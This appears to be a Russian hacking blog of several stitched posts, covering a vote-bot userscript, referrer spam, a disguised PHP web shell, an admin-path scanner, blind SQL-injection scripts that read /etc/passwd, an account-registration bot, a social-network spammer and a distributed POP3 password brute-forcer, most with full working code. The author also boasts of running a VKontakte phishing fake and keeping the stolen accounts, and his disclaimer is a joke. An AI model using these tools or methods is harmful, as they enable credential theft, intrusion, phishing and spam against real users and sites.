Нам понадобятся следующие конкурсы (я буду называть их так): Встречи (скрипт meeting), Лицо с обложки (fsrating) и Голосование Мисс/Мистер (contest).

Userscript

Суть накрутки популярности заключается в автоматизации процесса голосования в приведенных выше конкурсах. Для автоматизации я предлагаю использовать Userscript. Что такое Userscript и как его устанавливать я уже описывал ранее.

Собственно сам скрипт:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

// ==UserScript==
// @name        fs_like_click
// @author Lukmus (blog.lukmus.ru)
// @namespace   fotostrana.ru
// @include     about:addons
// @version     1.0
// @require  http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
// ==/UserScript==
 
(function (window, undefined) {
    var w;
 
    if (typeof unsafeWindow != undefined) {
        w = unsafeWindow
    } else {w = window;}
 
    if (w.self != w.top)return;
 
    alert('fs photo click & contest click 10k with if loaded');
    if (/http:\/\/fotostrana.ru\/\?fsrating=(.)+/.test(w.location.href)) {
    	for(i=0;i<10000;i++){
		setTimeout(function(){
		  if(Math.random()*10>2)
		    $('.ibtn.ibtn-big.ibtn-blue.fsr-photo-like').click();
		  else
		    $('#fsr-photo-next-arrow').click();
		},i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/contest\/(.)+/.test(w.location.href)) {
 
    	for(i=0;i<10000;i++){
	        if(i==0)delay=10000; else delay=0;
 
		setTimeout(function(){
		  strs=/.+addPaid.+/.test($('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').attr('onclick'));
		  if(!strs)
		    $('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').click();
		  else
		    contestApp.popupMain.next();
 
		},delay+i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/meeting(\/)?/.test(window.location.href)){
      for(i=0; i<10000; i++){
	setTimeout(function(){$('.meeting-btn-bc.meeting-btn-bc-mb.btn.btn-big.btn-big-mb').click();},i*2000);
      }
    }
 
})(window);

В работе скрипта сможет разобраться любой, кто хоть чуть-чуть знает JavasScript и JQuery. Для не обладающих тайным знанием JS следует знать, что alert('fs photo click & contest click 10k with if loaded'); можно безболезненно удалить или закомментировать, если это предупреждение выводит из себя.

Эксплуатация

После того как Userscript успешно установлен, открываем в браузере Фотострану, логинимся и открываем 3 вкладки: Встречи, Лицо с обложки и Голосование Мисс/Мистер.

Голосование Мисс/Мистер

Помимо захода на саму страницу голосования надо собственно выбрать какого-нибудь персонажа и нажать на него, далее процесс голосования должен запуститься автоматически, однако если этого не произойдет следует обновить страницу (URL с уже выбранным персонажем).

Лицо с обложки

Тут для запуска надо тоже первоначально выбрать кого-нибудь, в случае если скрипт не стартанул нужно также обновить страницу.

Встречи

Здесь никого выбирать не надо, скрипт должен сразу начать голосовать, но если этого не произошло опять же обновляем страницу. Выбирать во Встречах можно не более 100 раз в час, скрипт автоматически выбирает не “Да”, а “Возможно”, но Фотострана учитывает и этот ответ тоже как положительный.

Собственно теперь остается только открыть три вкладки и свернуть браузер, через 3-5 часов ваша популярность взлетит до небес. Причиной такого неожиданного роста внимания к вашей персоне – любопытство и благодарность, если вы за кого-то голосуете или вам “нравится” чья-то фотография, то в Фотостране вас за это обязательно отблагодарят ни о чем не подозревающие дамочки по ту сторону монитора.

почему нужен браузер

Сделать простой скриптик, который бы заходил на все подряд сайты имея при этом в заголовке нужный нам реферер не вариант т.к. он прокатит только в том случае если статистику ведет какой-нибудь серверный скрипт/плагин к CMS итд, в случае если веб-мастер смотрит статистику через всякие JS-ые штуки типа Яндекс.Метрика или Google Analytics, а такой расклад преобладает, наш реферер никуда не запишется т.к. простенький скриптик, мягко говоря, не умеет интерпретировать JavaScript.

Собственно поэтому нам нужен полноценный браузер.

firefox & RefControl

Т.к. я в основном пользуюсь FF, я рассматривал только его.
Изменить заголовок пакета, в том числе и referer, в FF можно миллиардом разных плагинов, но чтобы изменить его 1 раз для всех сайтов и всех запросов больше не заходя в настройки нужен только 1 плагин  – RefControl.
Короче, устанавливаем этот RefControl в FF и настраиваем, благо там все элементарно. Лично я настроил так:

И вам тоже советую настроить также, поставить Referer как http://ii.lukmus.ru/.

На этом я и остановился, я также как и всегда лазию по инету, но еще и оставляю ссылку на себя.

автоматический вариант. суперкостыли

Лично я считаю, что сайты, веб-мастера которых смотрят рефереры на свои сайты, лежат здесь, причем на странице где-то больше 300-ой.
Поэтому предлагаю вот такой скриптик на Ruby, который парсит яндекс.блоги и загружает их поочереди в FF.

1
2
3
4
5
6
7
8
9
10
11
12
13

require 'net/http' 
 
http=Net::HTTP.new('blogs.yandex.ru')
(300..1000).each do |page|
  path="/top/standalone/?page=#{page}"
  resp,data=http.get(path)
  data.scan(/><\/a><a href="(http:\/\/.+?)" title=/i).
    collect{|l| l[0]}.each do |link|
    system("firefox #{link}")
    sleep 10 #время на прогрузку страницы
    system("killall firefox")
  end#each
end#each

Разумеется окно FF будет раздражительно появляться и исчезать на экране, и чтобы сэкономить нервные клетки предлагаю запускать подобные вещи в виртуальной машине.

Вообщем мне понадобилось и я дописал пару строчек, выполняющих авторизацию.

Я предлагаю 2 вида авторизации:

• ввод пароля в адресной строке методом GET
• хэш пароля в User-Agent браузера

Второй способ мне больше нравится т.к. не надо ничего запоминать, однако в таком случае если вы зайдете с этого браузера на любой другой сайт, то ваш хэш с легкостью будет перехвачен и записан в лог апача. Поэтому лучше использовать 2 способа одновременно.

Конфиг авторизации лежит в самом начале скрипта шелла:
//---------------------config-
$get_pass=md5("getpass"); //пароль по GET
$ua_pass=md5("uapass"); //пароль по User-Agent
$auth_var=array(
'get_pass'=>true, //вкл/выкл GET
'user_agent'=>false); //вкл/выкл User-Agent
//----------------------------

В случае неудачной авторизации шелл выдаст ошибку 404 и немного изменит в адресной строке адрес т.е. заредиректит на схожий путь, тем самым запутав любопытного админа.

Ввод пароля по GET делается так:
/path/to/shell.php?kw=getpass

Для того, чтобы войти по User-Agent нужно вбить в браузер, чтобы он давал такой заголовок в пакете. Например в Firefox’е это делается так:

• в адресной строке вводим about:config
• в поле фильтр вбиваем general.useragent.extra.firefox
• дописываем в значение поля хэш нашего $ua_pass

Скачать это дело можно тут.

Однако, часто так бывает, что на одном хостинге (аккаунт хостинга) размещается куча сайтов, но т.к. аккаунт от хостинга 1, то и сервер БД один, а иногда и БД одна для разных сайтов.

Короче, представим такую ситауцию, вы нашли уязвимое место, скажем SQL-inj, вытащили все пароли, но на этом сайте нет админок или эти пароли не подходят. В таком случае нужно найти все сайты, которые висят на этом сервере или же все сайты, которые принадлежат этому акку хостинга. Узнать последнее – задача не тривиальная, а первое можно через тот же 2ip.ru.

Далее весь этот список сайтов нужно просканировать на различные пути к админке. Havij позволят за 1 раз искать пути только к 1 сайту. А если у нас список из 50-100 сайтов, то каждый раз вбивать в ручную в Havij утомительно.

Я предлагаю такой простенький скриптик, который переберет все пути к списку сайтов. Скачать можно здесь.

конфигурация

Открываем файл config.rb и видим:

1
2
3
4

$site_list="site_list" # список сайтов
$admin_list="admin_list" # список путей к админкам
$th_count=50 # количество потоков
$log_file="log" # лог файл, записываются успешные пути

и все сразу становится понятно.

В архиве прилагается список путей к админкам честно украденный из Havij.

Принцип работы скрипта прост – запрашивает страницу с данным путем и если код ответа сервера не равен 404, то путь записывается в $log_file как успешный.

Еще хочу попросить, если у кого-то есть более полный список путей к админкам, то выложите где-нибудь, пожалуйста.

Однако, была одна надежда – нужно было прочитать один скрипт, который располагался в поддомене основного, но путь к нему я не знал. Честно говоря, я на солярном сервере вообще плохо ориентировался.

Решение мне подсказал rat-energizer с rdot‘а.

решение

Читаем /etc/vfstab и видим там что-то типа

#device device mount FS fsck mount mount
#to mount to fsck point type pass at boot options
#
fd - /dev/fd fd - no -
/proc - /proc proc - no -
/dev/md/dsk/d2 - - swap - no -
/dev/md/dsk/drk /dev/md/rdsk/d1 / ufs 1 no logging
/dev/md/dsk/dw /dev/md/rdsk/d3 /www ufs 2 yes logging
/dev/md/dsk/dat /dev/md/rdsk/d4 /data ufs 2 yes logging
/dev/md/dsk/da /dev/md/rdsk/d5 /app ufs 2 yes logging
swap - /tmp tmpfs - yes--

Внимательно смотрим и если видим там UFS, то дело в шляпе.

Документации по этой теме я не нашел. Короче суть дела в том, что файловая система UFS, по крайней мере, в Solaris предоставляет возможность читать директории как файлы. Программно открыв директорию можно получить список содержащихся там файлов.

Эта директория-файл читается как бинарный файл, поэтому скрипт не должен останавливатся когда при чтении дойдет до символа с ASCII больше 127 или равному 0.

Для примера, если прочитать /etc, то в выходном файле будет что-то типа


...TIMEZONEautopushcfgadmclricroncron.ddcopydefaultdfsdhcpfffmthardformatfsfsck
и так далее...

Если вы будете использовать эту возможность, для считывания файла через MySQL через мой скрипт в прошлой статье, то там следует поменять условия проверки окончания файла, если ASCII-код символа равен 0 или больше 127.

Первый скрипт долгий т.к. однопоточный, зато точный т.е. стопудов однозначно вычислит символ до которого дошел. Второй многопоточный, иногда немного недовычисляет при частых обрывах сети, однако допустим для вычисления текста файла функцией MySQL LOAD_FILE в самый раз т.к. гораздо быстрее обработает длинный текст, а не досчитанные символы можно самому догадатся или же пробежатся по ним первым скриптом.

Аналогов, наверное, существует немерянно, но несмотря на это, я думаю, что мои скрипты обладают отличным преймуществом – они очень гибкие т.к. примитивны и в них очень легко разобратся.

Что такое SQL-inj, в том числе и слепая скуля, как с ними быть и многое другое, на мой взгляд лучше всего описано в этом FAQ на rdot’е.

скачать скрипт

Как вы понимаете, если у вас слепая инъекция, то никаких прямых выводов на страницу не может быть. Вы задаете какой-либо предикат, а проще говоря, условие, например

128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

и в соответсвии с этим условием у вас отобразится, например, либо новость под номером 10, либо 9. Приведу пример полного запроса:

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

ну или так:

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --


В первом примере, если 128 больше ASCII-кода первого символа файла /etc/passwd, то выведется страница с новостью 10, в противном случае, выведется 9. Второй случай практически идентичен первому, заисключением того, что если не больше ASCII-кода, то выведется неизвестно какая страница (для каждого сайта индивидуально, надо просто попробывать запрос http://site.com/?id= ), скорее всего это будет редирект на главную.

Вообще существует достаточно много всяких способов раксрутки слепых скулей, не только по странице, которую мы получаем на выводе. Короче читаем FAQ, ссылка на которую указана выше.

Так вот скрипт, берет допустим первый символ и формирует такой запрос:

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1))

если условие верно т.е. открылась страница с новостью 10, значит 128>=ASCII>=0, тогда скрипт делает запрос

64>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

32>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

тогда следующий запрос, будет отталкиватся от кода 48 (48=32+32/2)

48>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

тогда вычитаем 8 (на прошлом ходе прибавляли 16, на каждом шаге делем на 2)

40>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

44>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

42>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

41>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

42=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

таким образом мы за 9 шагов однозначно определили символ.

Далее скрипт берет следующий символ и начинает все заново.

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

Я не читал, все статьи по blind SQL-inj, поэтому если кто-то придумал такой перебор раньше меня, а так наверняка оно и есть, не обижайтесь, что здесь нет ссылки на вышу статью и укажите ее в комментариях.

Все разгаданные символы скрипт записывает в файл и выводит на экран консоли.

Она располагается в начале скрипте и представляет из себя инициализацию глобальных переменных.

#config
$request="/article.php?id=44+AND+##NUM####SIGN##ASCII%28MID%28##REPLACE##,##I##,1%29%29"
$outfile="outfile"
$priznak="eta_kartinka_est_tolko_v_statie_s_nomerom_44.jpg"
$func="LOAD_FILE%28"+"0x2f6574632f706173737764"+"%29" #/etc/passwd
$site="www.site.com"
$start=1
#config

$request – сам запрос, с метками:

• ##NUM## – число с которым сравнивается ASCII-код
• ##SIGN## – место, куда будет подставляться знак (>,=)
• ##REPLACE## – сама функция, задающаяся в переменной $func
• ##I## – номер символа

Задаем эту переменную в соответствии с нашим запросом, при этом правильно расставляем метки.

$outfile - файл куда будет все выводится.
$priznak – часть страницы, отличающая страницу с верным выводом от неверной. Т.е. при таком виде запроса

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --

или

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

эта часть текста HTML должна присутствовать только в новости с индексом 10.

$func – функция, которую мы вызываем. Это может быть LOAD_FILE(), VERSION(), USER() итд, комбинации из них, короче все на что хватит фантазии.

$site – сайт, где располагается SQL-inj.

$start – номер символа, с которого начинать.

скачать скрипт

Принцип работы нечем не отличается, заисключением того, что скрипт вычисляет не последовательно символ за символом, а сразу паралельно несколько символов, количество которых равно количеству потоков заданных в конфигурации.

Конфигурация, такая же, добавился лишь один параметр $th_count. Он определяет количество потоков.

Чем же плох многопоточный вариант? При стабильном соединении с интернетом не чем т.е. он вычислит все символы как надо и быстро. Если же соединение часто обрывается, как например на 3G-модемах, то некоторые потоки будут умерать оставляя свой символ недовычисленным. Для примера, при нестабильном соединении (скорость скачет от 1КБ/с до 300КБ/с, соединение обрывается каждые 3-5 минут) из 10 символов 1 будет недовычислен.

Я по началу просто обрадовался этому, несомненно положительному событию. И только через несколько десятков минут понял, что на этом можно отлично поднять траф. Многие этим уже активно занимались, например те, кто первый бросил утку о том, что все без исключения сервера Вконтакте.ру конфискованны МВД за распостранение порнушки, нелицензионного софта и сливу в паблик какой-то госудраственной секретной лабуды. Многие на это активно велись.

Утку бросить я бы не смог т.к. не имею какого-нибудь достаточно популярного сайта или на худой конец твиттера. Поэтому я решил действовать по другому и вместо поднятия себя ТИЦ’а, путем вставки всевозможных ссылок на мою утку в форумах, конференциях итд, принялся сливать трафик на фейк контакта, вот таким способом (см. рисунок).

Иначе, говоря я писал где только можно, мол ” Вконтакте восстановил свою резервную копию и зайти на сайт можно по следующей ссылке”, “Вконтакту прикрыли домен и он переехал на этот адрес” и прочую ересь.

Модераторы регулярно терли мои темы, банили акки, но я не отступал т.к. выхлоп с таких сообщений был настолько шикарен, что количество подаренных мне акков за время паники превысило количество всех акков с фейка за последние две недели вместе взятых. Я уже начал подумывать, что мой фейк сам скоро упадет из-за столько активного посещения.

Когда Вконтакте воскрес многие люди, которые поняли что попались на фейк принялись менять пароли. Но далеко не все это поняли,  в общем, на данный момент у меня осталось чуть больше 80% аккаунтов.

В заключении могу сказать, что ни один пароль от аккаунтов я не поменял и никому ничего не продал, хотя мог бы. Не факт, конечно, что я не продам завтра…

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

В связи с этим событием, с которым может сравнится только финал ЧМ-2010, в адекватности судьи которого, кстати, я не уверен и не признаю никакого другого ЧМ кроме Нидерландов,  я считаю просто необходимо написать авторегер под эту штуку.

Сам скрипт авторега я не написал еще, да думаю и не надо, каждый и сам сможет переписать выложенный здесь код под свои нужды. А написал я класс или точнее сказать скрипт-библиотеку, естественно на Ruby, который содержит все необходимые методы для регистрации мыла, быть может заисключением проверки адреса на существование.

Сам скрипт

#!/usr/bin/ruby
require ‘net/http’
require ‘net/https’

def str2pc(str)
if !str then return “|ERR=#{str}|” end
i=0
pc=”
while i<str.size do
pc+=”%#{str[i].to_s(16)}”.upcase
i+=1
end
return pc
end

class Acc
attr_accessor :login,:pass,:domain
def initialize(login,pass,domain)
@login=login
@pass=pass
@domain=domain
@http=Net::HTTP.new(‘signup.mail.com’, 443)
@http.use_ssl = true
@path=’/UserInformationB.aspx’
end

def get_headers(refer)
return headers = {
‘Cookie’ => @cookie,
‘Referer’ => refer,
‘Content-Type’ => ‘application/x-www-form-urlencoded’,
‘User-Agent’=> ‘Mozilla/5.0 Gecko/20090909 Windows NT 5.0/9′
}
end

def get_fst_cook
begin
resp, data = @http.get(@path, nil)
@cookie = resp.response['set-cookie']
@__VIEWSTATE=data.split(“__VIEWSTATE\” value=\”")[1].split(“\”")[0]
@__EVENTVALIDATION=data.split(“__EVENTVALIDATION\” value=\”")[1].split(“\”")[0].gsub!(/([^a-zA-Z0-9])/){str2pc($1)}
rescue
return e
end
return 0
end

def reg
begin
data = “__VIEWSTATE=#{@__VIEWSTATE}&__EVENTVALIDATION=#{@__EVENTVALIDATION}&hOptin=2&hdCheckbox=1&hdCampaignCheckbox=0&RefenceCode=event01&TrkID=0000&FirstName=fdsjhfj&LastName=jkvhfsdjk&drpMonth=06&drpDay=07&drpYear=1975&Username=#{@login}&Domainname=#{@domain}&Password=#{@pass}&PasswordConfirm=#{pass}&setpw=False&SecQuestion=3&SecAnswer=bhgfhgfhjfghgfhg&Agreed=Create+Account”
resp, data = @http.post(@path, data, self.get_headers(‘https://signup.mail.com/UserInformationB.aspx’))
@cookie = @cookie+resp.response['set-cookie']
@path=resp['location']
resp, data = @http.get(@path, self.get_headers(‘https://signup.mail.com/UserInformationB.aspx’))
@path=resp['location']
resp, data = @http.get(@path, self.get_headers(“https://signup.mail.com/#{@path}”))
rescue => e
return e
end
return 0
end
end#class

#EXAMPLE
accs=Acc.new(“test”,”example”,”california.usa.com”) #test@california.usa.com:example
puts accs.get_fst_cook
puts accs.reg

Немного разберем скрипт.

Итак, он содержит 1 функцию – str2pc и класс Acc. str2pc преобразует символы в процент-код.

Класс Acc

• метод get_headers – возвращает заголовок пакета
• метод get_fst_cook – получает необходимые кукисы и параметры для дальнейшей регистрации
• метод reg – собственно сама регистрация

Рассмотрим подробнее метод get_fst_cook. Он получает страницу регистрации /UserInformationB.aspx методом GET, а в месте с ней и первые кукисы. Далее парсит страницу на 2 необходимых параметра:

1. __VIEWSTATE
2. __EVENTVALIDATION

причем в __EVENTVALIDATION попутно заменяются все символы, неудовлетворяющие регулярному выражению ([^a-zA-Z0-9]) на процент-код.

Метод reg. Отправляет собственно сам POST-запрос регистрации, а затем 2 GET запроса на страницы /UserInformationB.aspx и той, на которую стоит переадресации в полученном пакете. Последний запрос не обязателен и регистрация пройдет и без него, однако он нужен если вы не хотите получить при входе на мыло страницу о успешной реги и прочей фигне.

Как использовать класс

Все очень просто и пример описан под комментарием #EXAMPLE:

1. в конструкторе вводим логин, пароль и домен – accs=Acc.new(“test”,”example”,”california.usa.com”)
2. вызываем get_fst_cook, в случае ошибки возвращает текст ошибки, иначе 0 – accs.get_fst_cook
3. вызываем reg, в случае ошибки возвращает текст ошибки, иначе 0 – accs.reg

Это все. Чтобы сделать из этой библиотеки полноценный авторегер особого ума не надо, и если же вы все-таки его сделаете незабудьте выложить в паблик.

Скачать скрипт в нормальном виде можно здесь.

P.S. хочу также сказать спасибо nonamez’у за его пост в его блоге, где он поведал о плагине для FireFox Live HTTP Headers, без него было бы тяжко разбирать снифером HTTPS-пакеты. Статью можно прочитать здесь.

Во-первых, хотелось бы отметить недобросовестность веб-мастеров и верстальщиков этой СС, так например, если заходить на нее через линуксовую мозиллу, то заглавная страница предоставляет не совсем дружественный интерфейс:

Закончим со стебом.

Сегодня я покажу вам спамер по этой СС. Написан он, как обычно для меня, на Ruby и как всегда разделен на файлы, каждый из которых выполняет определенную задачу:

• config.rb – конфигурация
• lib.rb – скрипт-бибилиотека
• get_list.rb – исполняемый скрипт, набирает список id по нашим критериям
• main.rb – собственно сам спамер

Весь код приводить здесь, я думаю не имеет смысла, поэтому кратко пройдемся по основным деталям.

Код lib.rb представляет из себя класс Account, который содержит методы, помимо конструктора:

• auth – авторизация, в случае успешной возвращает 0
• send – отправить ‘что-то’, почему ‘что-то’, а не например сообщение станет понятно дальше
• sendmsg – отправить сообщение
• add2friend – пригласить в друзья
• gets_people – получить список аккков по критериям

А так же lib.rb содержит парочку ненужных функций: log – ведение логов и str2pc – перевод текста в процент-код.

Итак, почему же метод send отправляет ‘что-то’? Ответ прост, дело в том что в МТ отправить приглашение на дружбу и отправить сообщение это одно и тоже действие, отличаются там только некоторый параметры. И как следствие этого, методы sendmsg и add2friend используют метод send и лишь добавляют туда свойственные им параметры.

На этом более-менее соображающие программисты заканчивают читать статью, качают архив со скриптами и начинают творить новое малваре для МТ.

А для вас, уважаемые ленивцы, безфантазийные псевдокодеры, поисковые боты и прочая элита я опишу и все остальное.

Скрипт get_list.rb

#!/usr/bin/ruby

require ‘config.rb’
require ‘lib.rb’

def get_next(type)
if type==’random’ then     return 2000+rand(10000000) end
if type==’list’ then     return $list_from+=1 end
end

if $ptype!=’params’
fl=File.new($idfile,’a')
for i in 0..$count do fl.puts get_next($ptype) end
fl.close
else
acc=Account.new($test_login,$test_pass)
if acc.auth==0
ids=acc.gets_people($params['interest'],$params['city'],

$params['sex'],$params['agf'],$params['agt'],$count)
fl=File.new($idfile,’a')
ids.each {|id| fl.puts id}
fl.close
else puts “Invalid login or password” end
end

И делает он следующее:

1. считывает параметры из конфига
2. если собрать id надо не по параметрам, то будет нещадно эксплуатировать функцию get_next
3. функция get_next определяет как собирать id: по порядку или в случайном порядке, и собственно при каждом ее запуске возвращает id
4. если же список по параметрам, то в вызывает метод Account::gets_people
5. весь собранный любым способом список id выгружается в файл, заданный в конфигурации

Скрипт main.rb

Это сам наш спамер. Он работает тоже не сложно:

1. считывает из файла, список акков с каких мы спамим
2. ну и в цикле:
   1. считывает id, которая на очереде для спама
   2. берет акк для спама и авторизуется им (для каждого акка авторизация проводится только 1 раз)
   3. ну и сосбственно спамит, инвайтит или спамит и инвайтит
   4. в случае ошибки запишет ее в лог
3. и все

Конфигурация config.rb

#!/usr/bin/ruby

$accfile=”accfile.txt”
$idfile=”ids.txt”
$logfile=”log.txt”

$ptype=”list” #random/params/list – как искать

$wtype=”all” #add/msg/all

$test_login=”example@mail.ru”
$test_pass=”passwd”

$params=Hash[
'interest'=>'секс', #интересы
'city'=>'москва',
'sex'=>'male', #male/female - пол
'agf'=>'10', #возраст от
'agt'=>'30' #возраст до
]

$list_from=666

$count=1
$msgtext=”текст сообщения”

$accfile – файл с вашими акками вида login:pass

$idfile – список id

$logfile – логи

$ptype – тип составления списка id:

• random – случайно
• params – по параметрам
• list – по порядку

$wtype – тип действия:

• add – выслать инвайт на дружбу
• msg – отправить сообщение
• all – оправить сообщение и инвайт

$test_login и $test_pass – логин и пароль акка для набора id.

$params – здесь пишутся параметры для списка id, если список составляется по параметрам ($ptype=”params”).

$count – количество отсылаемых сообщений и количество id при составлении списка

$msgtext – текст сообщения

Ну вот и все, пользуйтесь но не переусердствуйте, иначе спамер в скором времени может оказатся неработоспособным.

Скачать спамер можно здесь, как установить и запустить ruby читаем здесь.

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.

Ниже я покажу как можно бесплатно (обычные брутфорсы обычно работают через прокси/соксы, которые либо бесплатные и очень долгие, либо платные) и главное быстро перебирать пароли к ящикам.
Моя первоначальная идея состояла в организации злой бот-сети из фрихостов, но об этом я расскажу в другой статье, пока лишь ограничимся одной функцией бота – попытка авторизации на POP3-сервере.

Итак, для начала нам нужен какой-нибудь бесплатный хостинг с поддержкой PHP5, версия должна быть именно пятая, в противном случае придется немного переписать серверные скрипты.
Допустим вы нашли фрихостинг, коих сейчас немерянно, и можно приступать к самому приложению, которое будет представляеть из себя многопоточный брутфорс списка мыл на популярные пароли. Если кому-то нужно иначе, клиентскую часть легко переписать на свой лад.

Брутфорс будет состоять из 2-х частей:

1. серверная – PHP-скрипты, которые будут по запросу клиента пытатся авторизоватся с заданным логином и паролем
2. клиентская – Ruby-скрипты, которые будут давать запрос, с указанием логина и пароля, по которым необходимо авторизоватся

Сервер (PHP-скрипты).

Сервер будет состоять из 3-х файлов:

1. библиотека – lib.php
2. конфигурация – config.php
3. сам скрипт авторизации – brut.php

В библиотеки lib.php содержится класс Email, который через функцию fsockopen() будет общатся с POP3-сервером. Взят именно такой принцип, а не скажем уже готовая mail() т.к. на более-менее нормальных хостингах подобные штуки отключены, запрещены и являются признаком преступления против человечества.

Итак, сам lib.php:

<?php
class Email {
var $server;
var $full_addr;
var $login;
const SOCK_ERR=-3;
const FST_GET_ERR=-2;
const LOGIN_ERR=-1;
const INCCORECT_PASS=0;
const SUCC=1;

function __construct($addr)
{$this->full_addr=$addr;
$this->set_serv();
$this->set_login(); }

private function set_serv ()
{$strpos=strpos($this->full_addr,’@');
$this->server=”pop.” . substr($this->full_addr,$strpos+1,strlen($this->full_addr)-$strpos); }

private function set_login ()
{$this->login=substr($this->full_addr,0,strpos($this->full_addr,’@')); }

public function try_auth ($pass)
{ $pop_conn = fsockopen($this->server, 110,$errno, $errstr, 10);
if (!(is_resource($pop_conn))) return -3;

$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -2;

fputs($pop_conn,”USER $this->login\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))    return -1;

fputs($pop_conn,”PASS $pass\r\n”);
$ans=fgets($pop_conn,1024);
if (!(substr_count($ans,”OK”)))return 0;

fclose($pop_conn);
return 1;
}
}
?>

Далее файл config.php, он не отличается сложностью и представляет из себя 2 переменные хранящие логин и пароль админа брутфорса, мы же хотим единолично пользоватся нашим брутом.

<?php
$login=”root”;
$pass=”jvgfdhg6hj”;
?>

Теперь перейдем к brut.php, который и будет промежуточным звеном между нашей клиентской частью и POP3-сервером.

<?php
include ‘lib.php’;
include ‘config.php’;

if (!isset($_POST['login']) || $_POST['login']!=$login) die();
if (!isset($_POST['pass']) || $_POST['pass']!=$pass) die();
if (!(isset($_POST['op_addr'])) || !(isset($_POST['op_pass']))) die();

$email= new Email($_POST['op_addr']);
echo ‘<ans>’.$email->try_auth($_POST['op_pass']).’</ans>’;
?>

brut.php тоже не является верхом сложности программирования на PHP: сначала мы проверяем логин и пароль админа, затем смотрим присутствуют ли адрес почты и предполагаемый пароль к ней, и в случае если все ништяк пробуем авторизоватся, посредством заранее написанного класса. В конце мы выводим числовой ответ. Тот кому нужны точные ответы  посмотрит lib.php, а я же скажу что 0 – пароль не подошел, 1 – пароль подошел.

На этом с серверной частью закончили, теперь берем эти 3 файла и заливаем на все фрихосты, где удалось зарегать.

Клиент (Ruby-скрипты).

Клиентская часть состоит из 2-х скриптов:

1. config.rb – файл конфигурации
2. main.rb – собственно сам клиент

Сначала рассмотрим кофиг. Представляет он из себя следующее:

#!/usr/bin/ruby

$servers=['lukmus.ru','second.server.ru','third.server.ru','etc.freehost.com']
$path=’/mailbrut/brut.php’

$login=”root”
$pass=”jvgfdhg6hj”

$th_count=3

$fl_addrs=”mail_list”
$fl_log=”mailbrut.log”
$fl_good=”good_accs”

$passes=['pass','qwerty','123456','12345','etc...']

Теперь разберемся в нем:

• $servers – здесь пишем наши фризосты
• $path – путь на фрихостинге до нашей серверной части, на всех сайтах должен быть один и тот же
• $login и $pass – пароль админа брута, должен совпадать с указанными в config.php в серверной части
• $th_count – количество потоков брутфорса, он же у нас многопоточный
• $fl_addrs – файл, записаны почтовые адреса которые мы брутим. Каждая запись должна начинатся с новой строки.
• $fl_log – лог, сюда пишутся все ошибки
• $fl_good – здесь будут сохранятся удачно сбрученные почтовые акки в виде login:pass
• $passes – записываем пароли, на которые брутим

А теперь рассмотрим сам скрипт, который будет выдавать запросы нашим хостингам.

main.rb:

#!/usr/bin/ruby
require ‘net/http’
require ‘config.rb’

class WEB_Server
def initialize (servers)
@servers=servers
@i=0
end#def
def next_s
server=@servers[@i]
@i+=1
if @i>=@servers.size then @i=0 end
return server
end#def
end#class

def log(logfl,msg)
mess=”#{Time.now} <-> #{msg}”
logf=File.new(logfl,’a')
logf.puts mess
logf.close
puts mess
end#def

puts “Lukmus PHP-Ruby WebMailBrut starting…”

servers=WEB_Server.new($servers)
accs=File.new($fl_addrs,’r')
while !accs.eof do
op_addr=accs.gets.chop
while Thread.list.size>$th_count do sleep(1) end
th=Thread.new(op_addr) do |p_addr|
$passes.each do |p_pass|
serv=servers.next_s
http = Net::HTTP.new(serv, 80)
data = “login=#{$login}&pass=#{$pass}&op_addr=#{p_addr}&op_pass=#{p_pass}”
headers = { ‘Content-Type’ => ‘application/x-www-form-urlencoded’}
resp, data = http.post($path, data, headers)
ans=data.split(‘<ans>’)[1].split(‘</ans>’)[0]
case ans
when ‘-3′
log($fl_log,”ERR #3 Can’t open socket <-> #{p_addr}:#{p_pass}”)
when ‘-2′
log($fl_log,”ERR #2 Can’t connect to server <-> #{p_addr}:#{p_pass}”)
when ‘-1′
log($fl_log,”ERR #1 Can’t input login <-> #{p_addr}:#{p_pass}”)
when ’0′
puts “#{serv} <-> #{p_addr}:#{p_pass} <-> invalid pass”
when ’1′
log($fl_good,”#{serv} <-> #{p_addr}:#{p_pass} <-> SUCCESS”)
break

end#case
#http.close
end#each
end#thread
end#while
th.join

Он работает по следующему принципу:

• ОСНОВНОЙ ПОТОК: открывает файл со списком адресов и берет первый
• ОСНОВНОЙ ПОТОК: создает поток, который будет работать с этим адресом
• ПОТОК: берет первый пароль из нашего списка
• ПОТОК: берет первый хостинг и посылает запрос серверу на попытку авторизации
• ПОТОК: далее берет следующий хостинг и следующий пароль и так далее
• ОСНОВНОЙ ПОТОК: берет следующее мыло из списка и создает новый поток под него и так далее.

